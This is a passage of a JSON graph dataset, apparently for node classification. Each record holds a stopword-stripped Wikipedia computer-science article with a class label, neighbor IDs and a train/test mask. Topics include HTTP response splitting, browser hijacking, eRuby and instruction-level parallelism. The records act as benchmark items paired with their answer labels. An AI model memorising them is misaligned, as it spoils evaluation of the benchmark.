immigration group washington-based immigration reform law institute filed legal challenge law claiming program conflicts federal law judge dismissed challenge october 14 2008 first cards issued january 15 2009 san francisco thus became one small growing number municipalities issuing municipal identification cards undocumented immigrants access form document",
    "neighbors": [
      6386
    ],
    "mask": "Test"
  },
  {
    "node_id": 5933,
    "label": 2,
    "text": "Logical_address:logical address computing logical address address item memory cell storage element network host appears reside perspective executing application program logical address may different physical address due operation address translator mapping function mapping functions may case computer memory architecture memory management unit mmu cpu memory bus physical address computer memory banks may mapped different logical addresses various purposes system supporting virtual memory may actually physical memory mapped logical address access attempted access triggers special functions operating system reprogram mmu map address physical memory perhaps writing old contents memory disk reading back disk memory contain new logical address case logical address may referred virtual address",
    "neighbors": [
      10792,
      1801,
      4553,
      5677,
      10734,
      5840,
      11539,
      9080,
      6485,
      3702,
      7134,
      6296,
      1502
    ],
    "mask": "None"
  },
  {
    "node_id": 5934,
    "label": 4,
    "text": "HTTP_response_splitting:http response splitting http response splitting form web application vulnerability resulting failure application environment properly sanitize input values used perform cross-site scripting attacks cross-user defacement web cache poisoning similar exploits attack consists making server print carriage return cr ascii 0x0d line feed lf ascii 0x0a sequence followed content supplied attacker header section response typically including input fields sent application per http standard rfc 2616 headers separated one crlf response headers separated body two therefore failure remove crs lfs allows attacker set arbitrary headers take control body break response two separate responses—hence name generic solution url-encode strings inclusion http headers location set-cookie typical examples sanitization include casting integers aggressive regular expression replacement although response splitting specific php php interpreter contains protection attack since version 4.4.2 5.1.2",
    "neighbors": [
      5636,
      8644,
      4198,
      2470,
      7965,
      3473,
      7324,
      119,
      5724,
      4797,
      4095
    ],
    "mask": "Test"
  },
  {
    "node_id": 5935,
    "label": 4,
    "text": "Browser_hijacking:browser hijacking browser hijacking form unwanted software modifies web browser settings without user permission inject unwanted advertising user browser browser hijacker may replace existing home page error page search engine generally used force hits particular website increasing advertising revenue browser hijackers also contain spyware example install software keylogger gather information banking e-mail authentication details browser hijackers also damage registry windows systems often permanently browser hijacking easily reversed instances may difficult reverse various software packages exist prevent modification many browser hijacking programs included software bundles user choose included offers installer another program often included uninstall instructions documentation presented way designed confusing average user order trick installing unwanted extra software several methods browser hijackers use gain entry operating system email attachments files downloaded suspicious websites torrents common tactics browser hijackers use rogue security software also hijack start page generally displaying message warning computer infected spyware lead antispyware vendor page start page return normal settings user buys software programs winfixer known hijack user start page redirect another website domain name system queried user types name website e.g wikipedia.org dns returns ip address website exists user mistypes name website dns return non-existent domain nxdomain response 2006 earthlink started redirecting mistyped domain names search page done interpreting error code nxdomain server level announcement led much negative feedback earthlink offered services without feature unwanted programs often include sign installed uninstall opt-out instructions hijacking programs constantly change settings browsers meaning user choices browser overwritten antivirus software identifies browser hijacking software malicious software remove spyware scanning programs browser restore function set user browser settings back normal alert browser page changed malicious browser hijacking programs steal browser cookies person computer order manipulate online accounts logged one company maliciously used google cookies install android apps onto user phone without knowledge consent microsoft windows 10 web browsers longer set user default without intervention changing default web browser must performed manually user settings default apps page ostensibly prevent browser hijacking number hijackers change browser homepage display adverts and/or set default search engine include astromenda www.astromenda.com ask toolbar ask.com esurf esurf.biz binkiland binkiland.com delta claro dregol jamenize mindspark groovorio sweet page search protect conduit along search.conduit.com variants tuvaro spigot en.4yendex.com yahoo etc ask toolbar widely bundled installer oracle java se criticized malware users remember manually deselect toolbar installation java installation especially severe denmark government sponsored digital signature system nemid reality single sign system public servers banks government offices 2015 relied java client side thus computers running microsoft windows denmark vulnerable unwanted ask toolbar installed babylon toolbar browser hijacker change browser homepage set default search engine isearch.babylon.com also form adware displays advertisements sponsored links spurious paid search results program collect search terms search queries babylon translation software prompts add babylon toolbar installation toolbar also comes bundled add-on software downloads 2011 cnet site download.com started bundling babylon toolbar open-source packages nmap gordon lyon developer nmap upset way toolbar tricked onto users using software vice-president download.com sean murphy released apology bundling software mistake part apologize user developer communities unrest caused similar variants babylon toolbar search homepage exist including bueno search delta search claro search search gol variants state owned babylon terms service toolbars created montiera conduit pup hijacker steals personal confidential information user transfers third party toolbar identified potentially unwanted programs pups malwarebytes typically bundled free downloads toolbars modify browser default search engine homepage new tab page several browser settings similar variants conduit search trovi.com trovigo.com better-search.net seekforsearch.com searchitdown.com need4search.com clearsearches.com search-armor.com searchthatup.com premiumsearchweb.com along variants created customized way toolbar creation service conduit ltd used offer program called conduit search protect better known search protect conduit cause severe system errors upon uninstallation claims protect browser settings actually blocks attempts manipulate browser settings page words makes sure malicious settings remain unchanged search protect option change search homepage recommended search home page trovi however users reported changing back trovi period time uninstall program search protect cause windows unbootable uninstall file removes files also boot files root c drive leaves backgroundcontainer.dll file start-up registry conduit associated malware spyware adware victims hijacker reported unwanted pop-ups embedded in-text advertisements sites without ads perion network ltd. acquired conduit clientconnect business early january 2014 later partnered lenovo create lenovo browser guard uses components search protect victims unwanted redirections conduit.com also reported attacked phishing attempts received unwanted email spam junk mail messages telephone calls telemarketers victims claim callers claimed apple microsoft isp told personal information used phone calls calls concerned browsing habits recent browsing history personal information used phishing attempts may associated spyware one first browser hijackers redirected user existing home page rogue coolwebsearch search engine results sponsored links antivirus antispyware programs unable properly remove particular hijacker man named merijn bellekom developed special tool called cwshredder specifically remove kind hijacker coolwebsearch popular browser hijacker owned 'fun web products coupon server adware program bundled multiple freeware applications downloaded internet users program may appear pcs without user knowledge coupon server may appear useful intrusive display ads without users permissions coupon server also considered malicious domain browser hijacker hijack internet browser forcibly lead user homepage disguised legitimate search engine fool visitors using website also direct browser suspicious domain alter browser settings ad-triggering software called gosave reported cause user experience issues intrusive characteristics victim appropriately informed installation ads inserted webpages adds plugin extension whichever web browsers default currently compatible internet explorer firefox chrome name add-on necessarily gosave – varies gs booster gs sustainer something else browser hijacker istartsurf.com may replace preferred search tools infection travels bundled third party applications installation may silent due affected users aware hijacker infected internet explorer google chrome mozilla firefox browsers mixi.dj offers media player also free toolbar conduit-based search engine toolbar add-on prompted add installation toolbar new hijacker alters browser homepage also adds computer registry creates strings memory changes internet explorer icon magnifying glass mystart.incredibar search mystart search incredibar mystart toolbar mystart search incredibar incredibar games-en dangerous internet browser hijacker virus spyware often comes embedded many download applications installers hypercam known install firefox internet explorer safari google chrome symptoms range symptoms simple processor drainage complete system crashes severe victim re-install entire operating system mystart uses browser helper objects case search tools infects users installing mystart search toolbar browser firefox vulnerable redirects internet users mystart ’ websites mystart.incredibar.com particular internet users report redirected every search webpage visit removing incredibar extremely daunting task since countless different variations infected systems expect find undesirable windows registry changes browser configuration changes files random strings installed user local settings folders depending user operating system version even computer location vary one pc next one version incredibar appears removable add-on plug-in extension within web browsers however simply removing incredibar via inbuilt browser add-on removal process enough since program already combined registry file installs re-installs upon system browser reboot virus spyware removal applications webroot spysweeper eset nod32 adwcleaner junkware removal tool known remove mystart.incredibar using applications revert user default search engine onewebsearch referred onewebsearch virus onewebsearch.com redirection virus malware categorized browser hijacker onewebsearch utilizes browser hijackers black-hat techniques infect computer system attach add-ons extensions toolbars popular internet browsers without permission turn causes internet browsers like chrome firefox internet explorer redirect onewebsearch.com search- home- start.onewebsearch.com related web pages third party domain names rockettab browser hijacker runs program browser plugin embeds search results rockettab search providers rockettab sets proxy runs http https traffic known create problems security applications uninstalling application removes proxy targeted ads search results rockettab provides sear4m.xyz categorized browser hijacker alters computer performance adware uses sear4m.xyz cause user click sear4m.xyz ads sear4m.xyz installed changes default dns settings browsers like mozilla firefox google chrome internet explorer often redirect various fake websites often laiden viruses searchassist browser hijacker piggybacks downloads untrusted websites change new tab homepage searchassist.net opens searchassist browser start-up stubborn uninstalled repeatedly change browser tabs homepage settings works firefox safari chrome internet explorer though compatible windows linux detected adwcleaner spyhunter malwarebytes also known slow computer performance cause blue screen death bsod screen causes computer restart viruses came searchassist searchassist unlike vosteran spyware links review sites cnet may recommend searchassist many users rate poorly searchassist claims legitimate search engine great personal results tempting victims hijack making one hardest hijacks recognize image search assist much like genuine google doodle search-daily.com hijacker may downloaded zlob trojan redirects user searches pornography sites also known slow computer performance searchult.com browser hijacker replaces users home page new tab page default search engine program advertised browser add-on supposed help customize tabs protect browsers affected programs searchult.com associated malware distribution website displays banner ad search box often adverts flash games searchgol.com also found search-gol search engine may show infected computer instead user default search engine cause getting onto homepage unknown known downloading malware onto computer replaces default homepage without user permission numerous antivirus websites blogs report searchgol virus potentially unwanted program pup sneaks inside system bundle programs initiates changes system without user permission removing searchgol easy victim must perform browser restore removing programs related downloaded browser hijacker searchnu.com domain domain search-results.com belong iac search media inc company known name ask jeeves inc lot popular domains web famous ask.com something searched searchnu search engine search results redirect ask.com related websites user still access google either entering address bar searching searchnu still homepage searchnu 3 clones searchnu.com/406 /409 /421 however removing searchnu easy following instructions shorte.st browser hijacker alters users ’ web browser settings without permission adware function injecting unwanted advertising users ’ browser detail shorte.st enter device modifies internet settings start tracking users internet activities cookies browser histories shares information third parties users ip address web page visits time users spend browser hijackers break devices several ways manual removal shorte.st work cases device may malfunction removal done correctly however removing shorte.st easy automatic following instructions snap.do smartbar developed resoft potential malware categorized browser hijacker spyware causes internet browsers redirect snap.do search engine snap.do manually downloaded resoft website though many users entrapped unethical terms affects windows removed add/remove program menu snap.do also download many malicious toolbars add-ons plug-ins like dvdvideosofttb general crawler save valet general crawler installed snap.do known use backdoor process re-installs re-enables every time affected user removes browser snap.do disable option change homepage default search engine resoft track following information using resoft products user consents personal data transferred processed within outside united states america using resoft website user agrees preceding uses information way resoft previous installer sourceforge included adware pup installers one particular one changes browser settings firefox chrome internet explorer show website istartsurf.com homepage changing registry settings installing software resets settings user tries change june 1 2015 sourceforge claimed stopped coupling third party offers unmaintained sourceforge projects taplika browser hijacker contains trojan viruses steals personal information user sends third party encrypt personal files folders well emails photographs video documents etc infects system user may lose data affected system could cause possible hardware damage tv wizard injekt internet toolbar/plugin internet explorer runs bho chrome firefox run extension plugs user default web browser modify number settings taking control browser search home pages new tab functionality well dns 'not found redirections additionally tv wizard change security settings browser might also lower overall security user pc done order allow program run uninterrupted user attempt uninstall tv wizard using standard methods add/remove programs parts program uninstalled items modified search home pages may still point unwanted web page privacy policy program states program track report behaviors user plugin installed including limited urls web pages user visits well search terms search results user queries vosteran browser hijacker changes browser home page default search provider vosteran.com infection essentially bundled third-party applications vosteran carries pup virus identity vosteran protected privacyprotect.org australia vosteran registered whiteknight suptab pup hijacker installation adds search toolbars redirects home page another link displays unwanted ads program bundled installation random freeware shareware programs may remain unseen security programs like legitimate software found installing cheat engine different version vlc player www.oldapps.com downloading applications certain freeware sites softonic.com download.com trovi uses bing legitimate search engine provide results user address bar changes bing.com searching n't fooled still searching trovi trovi used use website show search results logo top left hand corner page later switched bing attempt fool users little easier trovi deadly used taking ads search results depending browser using still considered browser hijacker also hijacks homepage new tab page settings change back original settings depending browser using might see ads page infects makes browser redirect google search engines trovi.com trovi created using conduit toolbar creation service known infect similar ways conduit toolbar",
    "neighbors": [
      7809,
      6797,
      5776,
      8978,
      9746,
      1046,
      10392,
      2213,
      681,
      9771,
      11313,
      2739,
      5442,
      4165,
      2887,
      9803,
      1622,
      87,
      5078,
      11225,
      7515,
      106,
      107,
      8299,
      877,
      6382,
      6643,
      4605,
      5631
    ],
    "mask": "None"
  },
  {
    "node_id": 5936,
    "label": 5,
    "text": "Remote_job_entry:remote job entry remote job entry procedure sending requests data processing tasks 'jobs mainframe computers remote workstations extension process receiving output tasks remote workstation rje workstation called remote usually located distance host computer workstation connects host modem local area network lan today known client–server model rje early form request–response architecture terms remote batch remote job system remote job processing also used rje facilities remote job entry rje also name os/360 component provided rje services rje workstation operator may complete console control job flow workstation mainframe depending local configuration policy conversational remote job entry crje component os/360 os/vs1 provides job submission job retrieval editing user interactive terminal netrjs protocol developed campus computing network ucla deliver batch jobs ibm 360 model 91 protocol originally assigned arpanet initial connection protocol sockets 71 73 75 later reassigned internet ports 71-74",
    "neighbors": [
      1121,
      868,
      11236,
      6342,
      10508,
      2222,
      8687,
      10415,
      340,
      2132,
      4151,
      2519,
      10072,
      8474,
      11416,
      3359
    ],
    "mask": "Test"
  },
  {
    "node_id": 5937,
    "label": 8,
    "text": "Usage_analysis:usage analysis usage analysis technique understanding usage statistics something example web statistics website",
    "neighbors": [
      119
    ],
    "mask": "Test"
  },
  {
    "node_id": 5938,
    "label": 2,
    "text": "Smarterphone:smarterphone smarterphone norwegian company making software mobile phones founded 1993 kvaleberg renamed december 2010 june 2007 venture capital investor ferd invested €2 million company january 2010 €3.6 million invested nokia completed acquisition smarterphone november 2011 head office oslo norway company also offices taiwan south korea japan united states smarterphone develops mobile software handsets mobile phone oems odms chipset vendors customers company also provides professional services areas 2008 kvaleberg company joined limo foundation 2009 mobile world congress presented madrid handset cooperation compal communications company main product smarterphone os platform-independent full mobile phone operating system applications suite feature phone segment smarterphone os called mimiria first unveiled mobile world congress show february 2008 used handsets kyocera c4700 vibo t588 madrid limo device smarterphone architecture clean-room strict model-view-controller design enables variations implemented little effort user interface smarterphone os programmed scripting language variant scheme object-oriented extensions smarterphone os includes user interface mmi software stack implementing full user interface middleware 2g 3g feature phones also integrates range third-party modules java jvm oracle corporation mobile browser obigo mms sms stack mobile messaging factory predictive text input nuance cootek handwriting recognition sinovoice nokia asha platform inherits capabilities smarterphone",
    "neighbors": [
      1216,
      10083,
      6276,
      8262,
      9863,
      3561,
      9964,
      9262,
      5201,
      2259,
      5363,
      5178,
      2235,
      2525
    ],
    "mask": "Test"
  },
  {
    "node_id": 5939,
    "label": 3,
    "text": "IBM_ThinkPad_240:ibm thinkpad 240 ibm thinkpad 240 ultra-portable laptop computer designed produced ibm june 1999 2001 one thinkpad 200 series models made available america smallest lightest thinkpad model produced date 240 series discontinued well 570 series replaced thinkpad x series 2000 first 240 series models included 300 mhz mobile celeron processor 64 mb built-in ram one slot memory expansion maximum 320 mb laptop also one first feature mini pci card slot built-in optical drive diskette drive included due size limitations external drive access via usb 1.0 port and/or ibm external floppy drive connector unit shipped either standard 6 gb hard disk drive 12 gb upgrade option 240 series models feature 10.4 tft display first models featured neomagic magicgraph128xd graphics chips 2 mb video memory 240 capable displaying svga 800x600 tft display xga output available external monitor 240s also audio controllers vga ports connect external display devices",
    "neighbors": [
      5606,
      3304,
      1776,
      3250,
      8850,
      3323
    ],
    "mask": "Test"
  },
  {
    "node_id": 5940,
    "label": 6,
    "text": "Shadow_paging:shadow paging computer science shadow paging technique providing atomicity durability two acid properties database systems page context refers unit physical storage probably hard disk typically order 1 64 kib shadow paging copy-on-write technique avoiding in-place updates pages instead page modified shadow page allocated since shadow page references pages disk modified liberally without concern consistency constraints etc page ready become durable pages referred original updated refer new replacement page instead page activated ready atomic referring pages must also updated via shadow paging procedure may recurse many times becoming quite costly one solution employed wafl file system write anywhere file layout lazy making pages durable i.e write-behind caching increases performance significantly avoiding many writes hotspots high referential hierarchy e.g file system superblock cost high commit latency write-ahead logging popular solution uses in-place updates shadow paging similar old master–new master batch processing technique used mainframe database systems systems output batch run possibly day work written two separate disks form storage medium one kept backup used starting point next day work shadow paging also similar purely functional data structures in-place updates avoided",
    "neighbors": [
      5120,
      890,
      10048
    ],
    "mask": "Train"
  },
  {
    "node_id": 5941,
    "label": 4,
    "text": "Emergency_power_system:emergency power system emergency power system independent source electrical power supports important electrical systems loss normal power supply standby power system may include standby generator batteries apparatus emergency power systems installed protect life property consequences loss primary electric power supply type continual power system find uses wide variety settings homes hospitals scientific laboratories data centers telecommunication equipment ships emergency power systems rely generators deep-cycle batteries flywheel energy storage fuel cells emergency power systems used early world war ii naval ships combat ship may lose function boilers power steam turbines ship generator case one diesel engines used drive back-up generators early transfer switches relied manual operation two switches would placed horizontally line position facing rod placed order operate switch one source must turned rod moved side source turned mains power lost due downed lines malfunctions sub-station inclement weather planned blackouts extreme cases grid-wide failure modern buildings emergency power systems still based generators usually generators diesel engine driven although smaller buildings may use gasoline engine driven generator larger ones gas turbine however lately use made deep cycle batteries technologies flywheel energy storage fuel cells latter systems produce polluting gases thereby allowing placement done within building also second advantage require separate shed built fuel storage regular generators automatic transfer switch used connect emergency power one side connected normal power feed emergency power feed side connected load designated emergency electricity comes normal side transfer switch uses solenoid throw triple pole single throw switch switches feed normal emergency power loss normal power also triggers battery operated starter system start generator similar using car battery start engine transfer switch switched generator starts building emergency power comes back going normal power lost unlike emergency lights emergency lighting type light fixture pattern building normal lights provides path lights allow safe exit lights service areas mechanical rooms electric rooms exit signs fire alarm systems back batteries electric motor pumps fire sprinklers almost always emergency power equipment emergency power may include smoke isolation dampers smoke evacuation fans elevators handicap doors outlets service areas hospitals use emergency power outlets power life support systems monitoring equipment buildings may even use emergency power part normal operations theater using power show equipment show must go use emergency power systems aviation either aircraft ground commercial military aircraft critical maintain power essential systems emergency done via ram air turbines battery emergency power supplies enables pilots maintain radio contact continue navigate using mfd gps vor receiver directional gyro hour localizer glideslope instrument landing aids microwave transmitters high power consumers mission-critical reliably operated battery supply even short periods hence absolute reliability required category 3 operations force airport usual run system diesel generator automatic switchover mains supply generator fail avoids interruption transmission generator brought operating speed opposed typical view emergency power systems backup generators seen secondary mains electrical supply computers communication networks modern electronic devices need power also steady flow continue operate source voltage drops significantly drops completely devices fail even power loss fraction second even generator back-up provide protection start-up time involved achieve comprehensive loss protection extra equipment surge protectors inverters sometimes complete uninterruptible power supply ups used ups systems local one device one power outlet may extend building-wide local ups small box fits desk telecom rack powers small number devices building-wide ups may take several different forms depending application directly feeds system outlets designated ups feed power large number devices since telephone exchanges use dc building battery room generally wired directly consuming equipment floats continuously output rectifiers normally supply dc rectified utility power utility power fails battery carries load without needing switch simple though somewhat expensive system exchanges never lost power moment since 1920s recent years large units utility power station usually designed unit system basis required devices including boiler turbine generator unit power step unit auxiliary transformer solidly connected one unit less common set-up consists two units grouped together one common station auxiliary turbine generator unit attached unit auxiliary transformer connected circuit automatically starting unit auxiliaries supplied power another unit auxiliary transformer station auxiliary transformer period switching first unit transformer next unit designed automatic instantaneous operation times emergency power system needs kick imperative power unit auxiliaries fail station shutdown occurrence known black-out regular units temporarily fail instead shutdowns grid expected remain operational problems occur usually due reverse power relays frequency-operated relays grid lines due severe grid disturbances circumstances emergency station supply must kick avoid damage equipment prevent hazardous situations release hydrogen gas generators local environment emergency power systems called emergency diesel generators edgs required feature nuclear power plants typically installed sets three edg installation designed safety-grade requirements safety systems plant next upcoming generation nuclear power plants includes designs multiple independent banks edgs abwrs 208 vac emergency supply system central battery system automatic controls located power station building used avoid long electric supply wires central battery system consists lead-acid battery cell units make 12 24 vdc system well stand-by cells battery charging unit also needed voltage sensing unit capable receiving 208 vac automatic system able signal activate emergency supply circuit case failure 208 vac station supply",
    "neighbors": [
      8233,
      8811,
      3181,
      5327,
      7248
    ],
    "mask": "None"
  },
  {
    "node_id": 5942,
    "label": 3,
    "text": "Exerion:exerion exerion ported msx family computer sg-1000 two sequels released exerion features parallax effects inertia simulation player shoots formations bizarre alien amoeba egg-throwing birds pterosaur-like creatures well ufos flying surface planet player two types guns slow double shot unlimited fast single shot limited family computer version game included compilation jaleco collection vol 1 playstation 2003 well game boy advance game jajamaru jr. denshoki jaleco memorial along five jaleco family computer games original arcade version later released playstation 4 part arcade archives label october 23 2014 japan july 7 2015 north america two sequels game released exerion ii zorni released msx 1984 alongside port original arcade game second exerizer released arcades 1987 released north america nichibutsu title sky fox player ship fighter ex playable character jaleco game tengoku series",
    "neighbors": [
      2121,
      3788,
      9006,
      1776,
      10064,
      10931
    ],
    "mask": "None"
  },
  {
    "node_id": 5943,
    "label": 9,
    "text": "PDA_Optional_Packages_for_the_J2ME_Platform:pda optional packages j2me platform pda optional packages j2me platform jsr 75 specification standardizes access java embedded devices mobile phones pdas data resides natively mobile devices jsr 75 part java framework sits top cldc set lower level programming interfaces 2 main components devices claim implement jsr 75 implement components",
    "neighbors": [
      4960,
      3561,
      5677,
      8882,
      9011
    ],
    "mask": "None"
  },
  {
    "node_id": 5944,
    "label": 1,
    "text": "Dark_data:dark data dark data data acquired various computer network operations used manner derive insights decision making ability organisation collect data exceed throughput analyse data cases organisation may even aware data collected ibm estimate roughly 90 percent data generated sensors analog-to-digital conversions never get used industrial context dark data include information gathered sensors telematics organizations retain dark data multitude reasons estimated companies analyzing 1 data often stored regulatory compliance record keeping organizations believe dark data could useful future acquired better analytic business intelligence technology process information storage inexpensive storing data easy however storing securing data usually entails greater expenses even risk potential return profit lot dark data unstructured means information formats may difficult categorise read computer thus analysed often reason business analyse dark data amount resources would take difficulty data analysed according computer weekly 60 organisations believe business intelligence reporting capability inadequate 65 say somewhat disorganised content management approaches useful data may become dark data becomes irrelevant processed fast enough called perishable insights live flowing data example geolocation customer known business business make offer based location however data processed immediately may irrelevant future according ibm 60 percent data loses value immediately analysing data immediately letting go 'dark lead significant losses organisation terms identifying fraud example fast enough addressing issue late according new york times 90 energy used data centres wasted data stored energy costs could saved furthermore costs associated underutilisation information thus missed opportunities according datamation storage environments emea organizations consist 54 percent dark data 32 percent redundant obsolete trivial data 14 percent business-critical data 2020 add 891 billion storage management costs otherwise avoided continuous storage dark data put organisation risk especially data sensitive case breach result serious repercussions financial legal seriously hurt organisation reputation example breach private records customers could result stealing sensitive information could result identity theft another example could breach company sensitive information example relating research development risks mitigated assessing auditing whether data useful organisation employing strong encryption security finally determined discarded discarded way becomes unretrievable generally considered advanced computing systems analysis data built higher value dark data noted data analytics foundation modern industrial revolution course includes data currently considered dark data since enough resources process data collected used future bring maximum productivity ability organisations meet consumers demand technology advancements helping leverage dark data affordably thanks young innovative companies datumize veritas lucidworks furthermore many organisations realise value dark data right example healthcare education organisations deal large amounts data could create significant potential service students patients manner consumer financial services pursue target population",
    "neighbors": [
      3323
    ],
    "mask": "Test"
  },
  {
    "node_id": 5945,
    "label": 8,
    "text": "ERuby:eruby eruby embedded ruby templating system embeds ruby text document often used embed ruby code html document similar asp jsp php server-side scripting languages templating system eruby combines ruby code plain text provide flow control variable substitution thus making easy maintain view module rails responsible display response output browser simplest form view piece html code static content applications static content may enough many rails applications require dynamic content created controller action method displayed view made possible using embedded ruby generate templates contain dynamic content embedded ruby allows ruby code embedded view document code gets replaced proper value resulted execution code run time ability embed code view document risk bridging clear separation present mvc frame thus responsibility developer make sure clear separation responsibility among model view controller modules his/her application eruby allows ruby code embedded within pair codice_1 codice_2 delimiters embedded code blocks evaluated in-place replaced result evaluation apart creating web pages eruby also used create xml documents rss feeds forms structured text files eruby dynamically generates static files based templates functionalities eruby found erb library different types tag markers used erb templates indicates tag encloses expression tag starts opening tag delimiter followed equal symbol ends end tag delimiter rendering template piece code gets substituted result code evaluated result string gets converted string rendered example resulting text looks like value x 500 code enclosed tags called scriptlet code tag gets executed result gets replaced place scriptlet tags must matching tag denote end functional block example example text list item gets printed four times scriptlet produces text makes enclosed statement run multiple times output code contents comment tags n't get rendered output tags start open tag delimiter followed hash symbol end end tag delimiter example comment tag shown comment ruby ruby code ignored generates nothing things common eruby simply common ruby string substitution codice_3 similar languages perl php newlines eruby suppressed adding hyphen beginning end tag delimiter example 2.times end output code value name gets printed twice line several implementations eruby namely erb implementation eruby written purely ruby programming language included ruby standard library template generated running piece code written using erb object simple example shown require 'erb' x 400 simple_template value x x renderer erb.new simple_template puts output renderer.result binding result looks follows value x 400 could achieved using code make use erb object x 400 string value x x puts string code snippets generate output happens interchange lines 2 line 3 first code snippet line 1 line 2 second code snippet first snippet changes code shown require 'erb' simple_template value x x x 400 renderer erb.new simple_template puts output renderer.result binding still generates output i.e. value x 400 second code snippet changes code string value x x x 400 puts string code get executed 1st line know value x gets executed thus main reason using erb object write templates ahead time binding variables methods may exist given time template gets processed result called erb object order get access instance methods instance variable object erb makes use binding object access variables methods object given private binding object exists ruby class easy get access methods variables within method class access variables different class class expose binding object via public method example shown class erbexample end example erbexample.new variable1 renderer erb.new template puts output renderer.result example.get_binding see example exposing binding object class erbexample furthermore used binding object access variables methods class within one methods new method erb object takes two parameters second parameter specifies safety level giving number second parameter max value 4 one make template run different thread value number determines safety level maximum isolation level unless binding object marked trusted erb use third parameter specify optional modifiers used control adding newlines output example make sure erb output newlines tag ends create erb object shown renderer erb.new template 3 provide third parameter ignore second parameter use 0 input second parameter erb many methods exposed used render template full list apis exposed erb object refer erb documentation given reference section already explained previous sections erb used generate templates often used generate web pages text files usually needs erb push output desired file achieve use redirection ability provided command-line redirect output file rather making print standard output example output gets redirected my_view.html.erb file linking third party libraries achievable making use -r option providing name library remember functionality one remember ruby key word require functionality -r option example uses ipaddr library mentioned safety levels previous section one specify safety level command line argument using -s option erubis implementation eruby implemented ruby also java according home page runs faster eruby erb several useful options including alternate tags allowing valid xml ember pure ruby implementation eruby linux allows debugging eruby templates improves composability provides powerful shorthand eruby directives table compares tags available implementations",
    "neighbors": [
      7430,
      8582,
      9229,
      2191,
      7695,
      10771,
      9245,
      5677,
      3120,
      564,
      1973,
      4277,
      823,
      4918,
      10555,
      1852,
      5567,
      6338,
      8644,
      11208,
      5578,
      10973,
      479,
      1379,
      11625,
      7026,
      2804,
      2556
    ],
    "mask": "Test"
  },
  {
    "node_id": 5946,
    "label": 9,
    "text": "Heinz_Rutishauser:heinz rutishauser heinz rutishauser 30 january 1918 – 10 november 1970 swiss mathematician pioneer modern numerical mathematics computer science heinz rutishauser father died 13 years old mother died three years later together younger brother sister went live uncle home 1936 rutishauser studied mathematics eth zürich graduated 1942 1942 1945 assistant walter saxer eth 1945 1948 mathematics teacher glarisegg trogen 1948 received phd eth well-received thesis complex analysis 1948 1949 rutishauser united states universities harvard princeton order study state art computing 1949 1955 research associate institute applied mathematics eth zürich recently founded eduard stiefel worked together ambros speiser development first swiss computer ermeth developed programming language superplan 1949–1951 name reference rechenplan i.e computation plan konrad zuse terminology designating single plankalkül-program contributed particular field compiler pioneering work eventually involved defining programming languages algol 58 algol 60 among contributions introduced number basic syntactic features programming notably keyword codice_1 loop first german für superplan next via english translation algol 58 1951 rutishauser became lecturer german privatdozent 1955 appointed extraordinary professor 1962 associate professor applied mathematics eth 1968 became head group computer science later became computer science institute ultimately 1981 division computer science eth zürich least since 1950s rutishauser suffered heart problems 1964 suffered heart attack recovered died 10 november 1970 office acute heart failure untimely death wife margaret took care publication posthumous works",
    "neighbors": [
      512,
      1952,
      8262,
      1610,
      9804,
      8813,
      6160,
      9330,
      6036,
      1783,
      5496
    ],
    "mask": "Test"
  },
  {
    "node_id": 5947,
    "label": 9,
    "text": "Andrew_D._Gordon:andrew d. gordon andrew d. gordon british computer scientist employed microsoft research research interests include programming language design formal methods concurrency cryptography access control gordon earned ph.d. university cambridge 1992 1997 gordon research fellow university cambridge computer laboratory joined microsoft research laboratory cambridge england principal researcher programming principles tools group also holds professorship university edinburgh gordon one designers concurrent haskell functional programming language explicit primitives concurrency co-designer martin abadi spi calculus extension π-calculus formalized reasoning cryptographic systems luca cardelli invented ambient calculus reasoning mobile code moritz y. becker cédric fournet gordon also designed secpal microsoft specification language access control policies gordon ph.d. thesis functional programming input/output 1993 distinguished dissertation award british computer society 2000 paper ambient calculus subject luca cardelli anytime anywhere modal logics mobile ambients 2010 sigplan influential popl paper award",
    "neighbors": [
      2737,
      4916,
      8262,
      9535
    ],
    "mask": "Test"
  },
  {
    "node_id": 5948,
    "label": 3,
    "text": "Instruction-level_parallelism:instruction-level parallelism instruction-level parallelism ilp measure many instructions computer program executed simultaneously two approaches instruction level parallelism hardware level works upon dynamic parallelism whereas software level works static parallelism dynamic parallelism means processor decides run time instructions execute parallel whereas static parallelism means compiler decides instructions execute parallel pentium processor works dynamic sequence parallel execution itanium processor works static level parallelism consider following program operation 3 depends results operations 1 2 calculated completed however operations 1 2 depend operation calculated simultaneously assume operation completed one unit time three instructions completed total two units time giving ilp 3/2 goal compiler processor designers identify take advantage much ilp possible ordinary programs typically written sequential execution model instructions execute one order specified programmer ilp allows compiler processor overlap execution multiple instructions even change order instructions executed much ilp exists programs application specific certain fields graphics scientific computing amount large however workloads cryptography may exhibit much less parallelism micro-architectural techniques used exploit ilp include known ilp exploited compiler hardware support compiler also provides inherent implicit ilp programs hardware compilation optimization optimization techniques extracting available ilp programs would include scheduling register allocation/renaming memory access optimization dataflow architectures another class architectures ilp explicitly specified recent example see trips architecture recent years ilp techniques used provide performance improvements spite growing disparity processor operating frequencies memory access times early ilp designs ibm system/360 model 91 used ilp techniques overcome limitations imposed relatively small register file presently cache miss penalty main memory costs several hundreds cpu cycles principle possible use ilp tolerate even memory latencies associated resource power dissipation costs disproportionate moreover complexity often latency underlying hardware structures results reduced operating frequency reducing benefits hence aforementioned techniques prove inadequate keep cpu stalling off-chip data instead industry heading towards exploiting higher levels parallelism exploited techniques multiprocessing multithreading",
    "neighbors": [
      7173,
      9739,
      2066,
      7699,
      5655,
      10779,
      10781,
      6181,
      8231,
      6184,
      3630,
      6705,
      7218,
      2623,
      2113,
      7234,
      3142,
      2638,
      604,
      2140,
      1122,
      4194,
      3175,
      5223,
      8810,
      4205,
      8815,
      630,
      6774,
      8822,
      7802,
      6268,
      3197,
      7313,
      6815,
      8352,
      5793,
      2210,
      6818,
      6821,
      5798,
      7852,
      9391,
      2224,
      2226,
      7858,
      9911,
      8890,
      4286,
      2241,
      2243,
      9932,
      5329,
      4308,
      10966,
      2264,
      731,
      11487,
      2273,
      10469,
      7911,
      10985,
      9964,
      5358,
      1776,
      8944,
      757,
      2805,
      10485,
      249,
      8700,
      6909,
      8447,
      1798,
      1801,
      6926,
      6415,
      785,
      1298,
      11539,
      7963,
      10013,
      2339,
      6950,
      2345,
      3882,
      4909,
      3886,
      309,
      8501,
      4928,
      8514,
      5956,
      4423,
      7497,
      330,
      1866,
      6476,
      8523,
      7505,
      9044,
      11604,
      344,
      2394,
      8543,
      1376,
      11618,
      10603,
      4465,
      10612,
      1399,
      7033,
      1402,
      3457,
      398,
      3470,
      5518,
